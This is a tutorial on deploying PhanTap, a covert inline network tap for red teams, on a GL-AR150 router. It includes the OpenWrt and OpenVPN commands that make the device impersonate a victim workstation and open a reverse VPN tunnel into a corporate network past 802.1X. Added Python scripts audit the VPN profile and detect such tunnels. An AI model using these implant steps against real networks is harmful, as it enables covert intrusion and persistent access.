The ‘PhanTap’ is an ‘invisible’ network tap written by the guys at NCC Group and aimed at red teams. With limited physical access to a target building, the tap can be installed inline between a network device and the corporate network. PhanTap is silent on the network and does not affect the victim’s traffic, even on networks with NAC (Network Access Control, 802.1X-2004). PhanTap analyzes the traffic it sees and masks its own traffic as the victim device. It can bring up a tunnel back to a remote server, giving the user a foothold in the network for further analysis and pivoting.
The physical device used for our testing is currently a small, inexpensive router, the GL.iNet GL-AR150.
NCC Group explains more about the software, including basic setup instructions, here.
I will be setting up the ‘PhanTap’ in the following scenario:
The device will be placed between a target workstation and the corporate network using Ethernet cables. After being plugged in, the ‘PhanTap’ device will auto-configure itself and establish a secure VPN (Virtual Private Network) connection back to a remote OpenVPN Access Server operated by a red team. This allows a reverse tunnel back into the network from the OpenVPN Access Server.
Before configuring the ‘PhanTap’ device, I am going to set up an OpenVPN Access Server so the device has an endpoint to connect to.
OpenVPN Access Server
To set up the OpenVPN Access Server, I will be using a DigitalOcean droplet with the following options:
Once the droplet instance was live, I logged into the web interface of the OpenVPN Access Server. Within the web interface, you need to create a new user along with a password. This new user will be the ‘PhanTap’ device’s connection profile, so I named the user ‘phantap’. Make sure you check ‘Allow auto-login’, and select ‘More Settings’ to reflect the options below:
Note: If you know the target subnets beforehand, add them under the VPN Gateway section. This is not required, however.
Once the user has been saved, grab the user configuration by logging into the OpenVPN Access Server on port 443 as the ‘phantap’ user and downloading the configuration.
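Before handing the downloaded profile to a headless device it is worth checking, by reading the file rather than by trial and error, that it really is an auto-login profile (client certificate and key embedded, no password prompt) and which hosts and ports it will try to reach. The following Python script is an added example, not part of the original post and not code from OpenVPN Access Server or PhanTap; the sample profile it parses is constructed to look like an Access Server auto-login export, and the PEM bodies in it are placeholder text, not real key material.

```python
"""Inspect an OpenVPN client profile before handing it to a headless device.

Added example (not from the original post, OpenVPN Access Server or PhanTap).
Parses the directives and the inline <ca>/<cert>/<key>/<tls-auth> blocks of a
.ovpn file and reports whether the profile can connect without a user prompt
and which remote hosts/ports it will try. SAMPLE_PROFILE is constructed and
its certificate material is placeholder text.
"""
import re

# Constructed sample profile (placeholder PEM bodies, not real keys).
SAMPLE_PROFILE = """\
client
dev tun
proto udp
remote vpn.example.com 1194 udp
remote vpn.example.com 443 tcp
nobind
persist-key
persist-tun
cipher AES-256-GCM
verb 3
<ca>
-----BEGIN CERTIFICATE-----
PLACEHOLDER-CA
-----END CERTIFICATE-----
</ca>
<cert>
-----BEGIN CERTIFICATE-----
PLACEHOLDER-CLIENT-CERT
-----END CERTIFICATE-----
</cert>
<key>
-----BEGIN PRIVATE KEY-----
PLACEHOLDER-CLIENT-KEY
-----END PRIVATE KEY-----
</key>
key-direction 1
<tls-auth>
-----BEGIN OpenVPN Static key V1-----
PLACEHOLDER-TA
-----END OpenVPN Static key V1-----
</tls-auth>
"""

# Same profile with a username/password prompt: this would stall an unattended client.
SAMPLE_USERPASS_PROFILE = SAMPLE_PROFILE.replace("verb 3\n", "verb 3\nauth-user-pass\n")

_BLOCK_OPEN = re.compile(r"^<([\w-]+)>$")


def parse_profile(text):
    """Return (directives, inline_blocks).

    directives: dict mapping each directive name to the list of argument
    lists it appears with (a directive such as 'remote' may repeat).
    inline_blocks: set of <tag> sections present; their bodies are skipped.
    """
    directives, blocks, current = {}, set(), None
    for raw in text.splitlines():
        line = raw.strip()
        if current is not None:          # inside an inline block: skip until it closes
            if line == f"</{current}>":
                current = None
            continue
        if not line or line[0] in "#;":  # blank line or comment
            continue
        m = _BLOCK_OPEN.match(line)
        if m:
            current = m.group(1)
            blocks.add(current)
            continue
        name, *args = line.split()
        directives.setdefault(name, []).append(args)
    if current is not None:
        raise ValueError(f"unterminated inline block <{current}>")
    return directives, blocks


def assess_profile(text):
    """Summarise the properties that matter for an unattended client."""
    d, blocks = parse_profile(text)
    default_proto = d.get("proto", [["udp"]])[0][0]
    remotes = []
    for args in d.get("remote", []):
        host = args[0]
        port = int(args[1]) if len(args) > 1 else 1194   # OpenVPN default port
        proto = args[2] if len(args) > 2 else default_proto
        remotes.append((host, port, proto))
    has_cert = "cert" in blocks or "cert" in d
    has_key = "key" in blocks or "key" in d
    return {
        "remotes": remotes,
        # Unattended only if a client cert+key are present and nothing prompts for a password.
        "unattended": has_cert and has_key and "auth-user-pass" not in d,
        # tls-auth/tls-crypt wraps the control channel; a cheap hardening check.
        "tls_wrapped": bool({"tls-auth", "tls-crypt"} & (blocks | set(d))),
        # Without remote-cert-tls the client does not insist the peer holds a server cert.
        "server_cert_check": "remote-cert-tls" in d,
    }


if __name__ == "__main__":
    for label, prof in (("autologin", SAMPLE_PROFILE), ("userpass", SAMPLE_USERPASS_PROFILE)):
        print(label, assess_profile(prof))
```

Run it against the real client.ovpn by reading the file into `assess_profile`; the `remotes` list doubles as the egress allow-list the device will need (the Access Server export tries UDP first and falls back to TCP/443), and a `False` under `unattended` means the device would sit waiting for credentials after boot.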
Now that we have an OpenVPN Access Server, we can focus on setting up the ‘PhanTap’ device by powering it up and connecting its WAN and LAN ports to the internet and to your workstation, respectively. I was able to log into the device at IP 192.168.1.1 as user ‘root’ without a password.
Before we can set up the ‘phantap’ package for OpenWrt, we need to make sure the device is updated to the snapshot binary provided here.
After downloading the snapshot above on my workstation, I copied BOTH the upgrade.bin and client.ovpn files to the device’s /tmp directory via SCP:
wget "https://downloads.openwrt.org/snapshots/targets/ath79/generic/openwrt-ath79-generic-glinet_gl-ar150-squashfs-sysupgrade.bin" -O upgrade.bin
scp upgrade.bin root@192.168.1.1:/tmp
scp client.ovpn root@192.168.1.1:/tmp
Once the device contains the ‘upgrade.bin’ file, we can log back into the device at 192.168.1.1 to complete the setup.
opkg update
sysupgrade -v /tmp/upgrade.bin
After the snapshot build has been installed, we can set up OpenVPN as well as the phantap package.
opkg install nmap
opkg install openvpn
opkg install phantap
The next step is to rename client.ovpn to client.conf and move it into the /etc/openvpn directory, then enable the OpenVPN service so it starts at boot. Note that /tmp on OpenWrt is a RAM disk and does not survive the sysupgrade reboot, so copy client.ovpn to the device again if it is no longer there.
mv /tmp/client.ovpn /etc/openvpn/client.conf
/etc/init.d/openvpn enable
Before deploying this device, I need to make sure the VPN connection is restarted when the ‘PhanTap’ device detects and configures a new IP.
sed -i 's/#list onnet/list onnet/g' /etc/config/phantap
/etc/init.d/openvpn restart
After restarting the OpenVPN service, you should see a VPN connection from the ‘PhanTap’ device to your OpenVPN Access Server as the user ‘phantap’, which means the ‘PhanTap’ VPN service is working correctly. Now that the VPN service automatically connects on start-up, we can enable the phantap service and mask our device on the network.
Remove the physical interfaces from any network interface that might be using them.
uci delete network.lan.ifname
uci delete network.wan.ifname
uci delete network.wan6.ifname
Add the interfaces to the phantap bridge and restart the network service via the following commands in the CLI (assuming we are using a GL-AR150):
uci set network.phantap.ifname='eth0 eth1'
uci commit network
/etc/init.d/network reload
Now, once the device reboots, it is ready to go. As soon as you plug this device into a new network, it will automatically mask as the target device and set up a reverse VPN tunnel into the network.
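From the network owner's side, the point of the setup above is that the tap borrows the workstation's MAC and IP, so nothing at layer 2 distinguishes it; what does remain visible is its reverse VPN, which leaves the site as one long-lived outbound flow that appears to come from the workstation. The following Python script is an added example, not part of the original post or the PhanTap project: it reads NetFlow-style records (the sample is constructed, with TEST-NET addresses for external hosts), builds a per-host baseline of external destinations, and flags later flows that are external, long-lived and new for that host. The field layout, the one-hour duration threshold and the two-day baseline window are assumptions for the demonstration.

```python
"""Flag a host that starts holding a long-lived tunnel to an endpoint it never used before.

Added example, not from the original post or the PhanTap project. Reads
NetFlow-style records (constructed sample below), learns each internal host's
external destinations during a baseline period, then reports later flows that
are external, long-lived and new for that host. Field layout, duration
threshold and baseline window are assumptions chosen for the demo.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

PRIVATE_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


@dataclass(frozen=True)
class Flow:
    day: str
    src: str
    dst: str
    dport: int
    proto: str
    duration_s: int
    bytes_out: int


# Constructed sample: "day src dst dport proto duration_s bytes_out".
# On 2019-07-03 host 10.0.5.23 holds an 8-hour udp/1194 flow to an address it
# never contacted during the baseline days; 10.0.5.24 touches the same
# address briefly over tcp/443, which the duration gate should ignore.
SAMPLE_FLOWS = """\
2019-07-01 10.0.5.23 198.51.100.20 443 tcp 12 8800
2019-07-01 10.0.5.23 10.0.1.10 445 tcp 3600 120000
2019-07-02 10.0.5.23 198.51.100.21 443 tcp 25 7000
2019-07-02 10.0.5.24 10.0.1.10 445 tcp 7200 90000
2019-07-03 10.0.5.23 203.0.113.7 1194 udp 28800 5200000
2019-07-03 10.0.5.23 198.51.100.20 443 tcp 9 6400
2019-07-03 10.0.5.24 203.0.113.7 443 tcp 15 3000
"""


def parse_flows(text):
    """Turn the whitespace-separated records into Flow objects."""
    flows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        day, src, dst, dport, proto, dur, nbytes = line.split()
        flows.append(Flow(day, src, dst, int(dport), proto, int(dur), int(nbytes)))
    return flows


def is_external(ip):
    """True when the address is outside the RFC 1918 ranges."""
    addr = ip_address(ip)
    return not any(addr in net for net in PRIVATE_NETS)


def baseline_destinations(flows, baseline_days):
    """Per source host: the external destinations seen during the baseline days."""
    seen = {}
    for f in flows:
        if f.day in baseline_days and is_external(f.dst):
            seen.setdefault(f.src, set()).add(f.dst)
    return seen


def detect_new_persistent_tunnels(flows, baseline_days, min_duration_s=3600):
    """Return post-baseline flows that are external, long-lived and new for their source."""
    known = baseline_destinations(flows, baseline_days)
    alerts = []
    for f in flows:
        if f.day in baseline_days or not is_external(f.dst):
            continue
        if f.duration_s >= min_duration_s and f.dst not in known.get(f.src, set()):
            alerts.append(f)
    return alerts


if __name__ == "__main__":
    hits = detect_new_persistent_tunnels(parse_flows(SAMPLE_FLOWS), {"2019-07-01", "2019-07-02"})
    for f in hits:
        print(f"{f.src} -> {f.dst}:{f.dport}/{f.proto} held for {f.duration_s}s, {f.bytes_out} bytes out")
```

Only the udp/1194 flow from 10.0.5.23 is reported; the 15-second tcp/443 contact from 10.0.5.24 is not, which is the intended trade-off: a tunnel that falls back to tcp/443 is indistinguishable from HTTPS by port alone, so duration and volume per destination carry the signal, and the baseline should be long enough to cover the host's normal destinations. At the link layer, 802.1X-2004 authenticates the port but does not encrypt frames, which is what lets an inline tap read and reuse the victim's traffic; MACsec (802.1X-2010) is the control that closes that gap.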